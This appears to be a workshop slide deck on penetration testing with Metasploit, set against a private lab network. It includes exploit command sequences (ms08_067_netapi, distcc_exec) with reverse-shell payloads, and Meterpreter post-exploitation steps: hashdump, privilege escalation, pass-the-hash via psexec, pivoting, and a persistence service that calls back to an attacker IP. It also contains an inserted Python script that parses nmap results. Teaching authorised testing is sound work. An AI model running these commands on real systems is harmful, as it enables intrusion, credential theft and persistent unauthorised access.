  • 1. Penetration Testing with Metasploit Georgia Weidman
  • 2. Acknowledgements • Metasploit Team • Offensive Security/Metasploit Unleashed • Hackers for Charity • David Kennedy • BSides Delaware Crew • Darren
  • 3. Agenda • Metasploit Basics – Some terminology/brief intro to pentesting – How Metasploit works – Interacting with Metasploit • Basic Exploitation – Exploiting a vulnerability using Metasploit console • Using Meterpreter – Using the Meterpreter shell for post exploitation
  • 4. Agenda • Metasploit in a penetration test – Information Gathering – Vulnerability Scanning – Exploitation in depth – Post exploitation – Reporting • Hack some stuff – Pop my boxes
  • 5. Connecting Wireless access point SSID IgnatiusRiley Password: metasploit
  • 6. What’s in the lab? • Windows XP SP2 – IP address: 192.168.20.22 • Ubuntu Linux 8.04 (Metasploitable) – IP address: 192.168.20.23 Others below .100 (.100 and above are you guys)
  • 7. What is Penetration Testing? Simulation of a real attack Get out of jail free card for exploiting systems Report to customers with findings and recommendations Find and remediate vulnerabilities before attackers exploit them
  • 8. What is Metasploit? Exploitation framework Ruby based Modular Exploits, payloads, auxiliaries, and more
  • 9. Metasploit Terminology Exploit: vector for penetrating the system Payload: shellcode, what you want the exploit to do Encoders: encode or mangle payload Auxiliary: other modules besides exploitation Session: connection from a successful exploit
  • 10. Metasploit Interfaces Msfconsole Msfcli Msfweb, Msfgui (discontinued) Metasploit Pro, Metasploit Express Armitage
  • 11. Exploitation Streamlining • Traditional Pentest: – Find public exploit – Change offsets and return address for your target – Replace shellcode • Metasploit: – Load Metasploit module – Select target OS – Set IP addresses – Select payload
12. Using Msfconsole: Exploitation
• use <module> – sets the exploit/auxiliary/etc. to use
• set <x X> – set a parameter
• setg <x X> – set a parameter globally
• show <x> – lists all available x
• exploit – runs the selected module

13. Windows Exploitation Example
• search windows/smb
• info windows/smb/ms08_067_netapi
• use windows/smb/ms08_067_netapi
• show payloads
• set payload windows/meterpreter/reverse_tcp
• show options
• set lhost 192.168.20.22 (set other options as well)
• exploit

14. MSFcli Exploitation Example
• ./msfcli <exploit> <option=x> E
• Example: msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.2 LHOST=192.168.1.3 PAYLOAD=windows/shell/bind_tcp E
• E = exploit
• O = show options
• P = show payloads

15. Linux Exploitation Example
• search distcc
• use unix/misc/distcc_exec
• show payloads
• set payload cmd/unix/reverse
• show options
• set rhost 192.168.20.23
• set lhost 192.168.20.102 (your IP)
• exploit

16. Sessions
• sessions -l – lists all active sessions
• sessions -i <id> – interact with a given session

17. Meterpreter
• Gain a session using a Meterpreter payload
• Memory based/never hits the disk
• Everything a shell can do plus extra

18. Meterpreter Commands
• help – shows all available commands
• background – backgrounds the session
• ps – shows all processes
• migrate <process id> – moves Meterpreter to another process
• getuid – shows the user

19. Meterpreter Commands
• download <file> – pulls a file from the victim
• upload <file on attacker> <file on victim> – pushes a file to the victim
• hashdump – dumps the hashes from the SAM
• shell – drops you in a shell

20. Exercise
• In Msfconsole, use ms08_067_netapi to get a reverse Meterpreter shell on the Windows XP machine.
• Experiment with different payloads and Meterpreter commands.

21. Information Gathering
• Learning as much about a target as possible
• Examples: open ports, running services, installed software
• Identify points for further exploration
22. Metasploit and Databases
• Metasploit supports MySQL and PostgreSQL
• /etc/init.d/postgresql-8.4 start (starts PostgreSQL)
• msf > db_connect postgres:password@127.0.0.1/metasploit (connects to the database server and creates the database metasploit)

23. Portscanning
• Queries a host to see if a program is listening
• Ex: Browsing to a website – the webserver listens on port 80
• Listening ports are accessible by an attacker and, if vulnerable, may be used for exploitation
• Ex: ms08_067_netapi exploits SMB on port 445

24. Metasploit and nmap
• Port scanning and just about everything else
• http://nmap.org/
• man nmap
• Ex: nmap -sV 192.168.20.20-99 -oA subnet1 (TCP version scan, all hosts 192.168.20.X, outputs multiple formats beginning with subnet1)
• msf > db_import subnet1.xml

25. MSF Auxiliary Portscanners
• msf > search portscan (shows portscan modules)
• scanner/portscan/tcp (runs a TCP SYN scan)
• Use auxiliary modules like exploits (use, set, exploit, etc.)

26. Some Other MSF Scanners
• scanner/smb/smb_version (scans port 445 for the SMB version, a good way to get the OS version)
• scanner/ssh/ssh_version (queries the SSH version)
• scanner/ftp/anonymous (anonymous FTP login)

27. Vulnerability Scanning
• Query systems for potential vulnerabilities
• Identify potential methods of penetration
• Ex: the SMB version scan in information gathering returned port 445 open and the target as Windows XP SP2; scan for the ms08_067_netapi vulnerability

28. Metasploit and Nessus
• Tenable's Vulnerability Scanner (http://www.nessus.org)
• msf > load nessus
• msf > nessus_connect student1:password@192.168.20.103 ok (ok says no SSL is ok)
• msf > nessus_policy_list
• msf > nessus_scan_new -4 pwnage <ip range> (scan using policy one, name it pwnage)
• msf > nessus_report_list
• msf > nessus_report_get <report id>

29. Metasploit Vulnerability Scanners
• SMB Login
  – Given a set of credentials, what systems can they access?
  – scanner/smb/smb_login
• Open VNC and X11
  – If misconfigured, may be accessible without credentials
  – scanner/vnc/vnc_none_auth
  – scanner/x11/open_x11
30. Using Msfconsole: Exploitation
• use <module> – sets the exploit/auxiliary/etc. to use
• set <x X> – set a parameter
• setg <x X> – set a parameter globally
• show <x> – lists all available x
• exploit – runs the selected module

31. Our Database
• hosts
• services
• vulns
• -c – select columns
• -s – search for a specific string
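As an added example (not part of the deck or of Metasploit itself), here is what db_import of an nmap -oA file (slide 24) and the hosts/services queries with -c and -s (slide 31) amount to, reduced to a small Python script. The nmap XML is constructed to look like a scan of the lab hosts, and the function names are mine.

```python
import xml.etree.ElementTree as ET

# Constructed nmap XML (not a real scan) shaped like the subnet1.xml that
# "nmap -sV 192.168.20.20-99 -oA subnet1" would write; lab addresses from the deck.
SAMPLE_NMAP_XML = """<nmaprun scanner="nmap" args="nmap -sV 192.168.20.20-99 -oA subnet1">
<host><status state="up"/><address addr="192.168.20.22" addrtype="ipv4"/><ports>
<port protocol="tcp" portid="139"><state state="open"/><service name="netbios-ssn"/></port>
<port protocol="tcp" portid="445"><state state="open"/>
<service name="microsoft-ds" product="Microsoft Windows XP microsoft-ds"/></port>
</ports></host>
<host><status state="up"/><address addr="192.168.20.23" addrtype="ipv4"/><ports>
<port protocol="tcp" portid="22"><state state="open"/>
<service name="ssh" product="OpenSSH" version="4.7p1 Debian 8ubuntu1"/></port>
<port protocol="tcp" portid="80"><state state="closed"/></port>
<port protocol="tcp" portid="3632"><state state="open"/><service name="distccd" version="v1"/></port>
</ports></host>
</nmaprun>"""


def import_nmap(xml_text):
    """Turn nmap XML into 'services' rows (host, port, proto, name, info),
    keeping only live hosts and open ports, which is what db_import records."""
    rows = []
    for host in ET.fromstring(xml_text).iter("host"):
        if host.find("status").get("state") != "up":
            continue
        addr = host.find("address[@addrtype='ipv4']").get("addr")
        for port in host.iter("port"):
            if port.find("state").get("state") != "open":
                continue
            svc = port.find("service")
            attrs = svc.attrib if svc is not None else {}
            rows.append({"host": addr, "port": int(port.get("portid")),
                         "proto": port.get("protocol"), "name": attrs.get("name", ""),
                         "info": " ".join(v for v in (attrs.get("product"), attrs.get("version")) if v)})
    return rows


def hosts(rows):
    """Distinct live addresses, like the msf 'hosts' command."""
    return sorted({r["host"] for r in rows})


def services(rows, search=None, columns=None):
    """Like 'services -s <string> -c <col,...>': case-insensitive substring
    match on service name/info, then project onto the requested columns."""
    if search:
        rows = [r for r in rows if search.lower() in (r["name"] + " " + r["info"]).lower()]
    if columns:
        rows = [{c: r[c] for c in columns} for r in rows]
    return rows
```

Running services(import_nmap(SAMPLE_NMAP_XML), search="microsoft-ds", columns=["host", "port"]) answers the slide 27 question (which hosts expose SMB on 445) from the imported scan alone.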
32. db_autopwn
• By default just runs all the exploits that match a given open port
• Not stealthy
• Using vulnerability data it can be made smarter: matches vulnerabilities instead of ports
• db_autopwn -x -e

33. Attacking MSSQL
• The MSSQL TCP port can change; the UDP port is 1434
• msf > search mssql (shows all MSSQL modules)
• msf > use scanner/mssql/mssql_ping (queries UDP 1434 for information, including the TCP port)
• msf > use scanner/mssql/mssql_login (tries passwords to log into MSSQL)
• msf > use windows/mssql/mssql_payload (logs into MSSQL and gets a shell)
34. We have a shell, now what?
• Privilege escalation
• Local information gathering
• Exploiting additional hosts
• Maintaining access
• Forensic avoidance

35. Meterpreter: Privilege Escalation
• A session has the privileges of the exploited process
• getuid (tells you what user your session is running as)
• getsystem (tries various techniques to escalate privileges)

36. Meterpreter: Enabling Remote Desktop
• Turn on remote desktop, get it through the firewall, put a user in the Remote Desktop Users group
• run getgui -e

37. Meterpreter: Migrating
• If the process that hosts Meterpreter closes, Meterpreter dies too
• Example: a client side exploit residing in the browser
• meterpreter > ps (shows all processes)
• meterpreter > migrate <process id> (moves to a new process)

38. Meterpreter: Searching for Content
• Look for specific interesting files on the exploited system
• search -h
• Example: search -f *.jpg (finds all the porn)

39. Pivoting
• Scenario: Exploit a dual networked host with a routable interface and a non-routable one. Can we attack other hosts on the non-routable interface without SSH tunneling?
• route add 10.0.0.0/24 1 (routes traffic to the subnet through session 1)
• Now you can portscan, exploit, etc. the non-routable subnet

40. PSExec
• hashdump (dumps the hashes, not always easy to crack)
• Why not just pass the hash to other systems?
• use windows/smb/psexec
• set SMBPass to the hash

41. Meterpreter: Persistence
• The persistence script installs a Meterpreter service
• Meterpreter comes back when the box restarts
• Ex: run persistence -U -i 5 -p 443 -r 192.168.20.101 (respawns on login, at a 5 second interval, on port 443, to IP 192.168.20.101)

42. Exercises
• Perform a penetration test on the Windows and Linux systems we used in class
• Perform a penetration test on the lab network

43. Contact
Georgia Weidman
Website: http://www.grmn00bs.com, http://www.georgiaweidman.com
Email: georgia@grmn00bs.com
Twitter: @vincentkadmon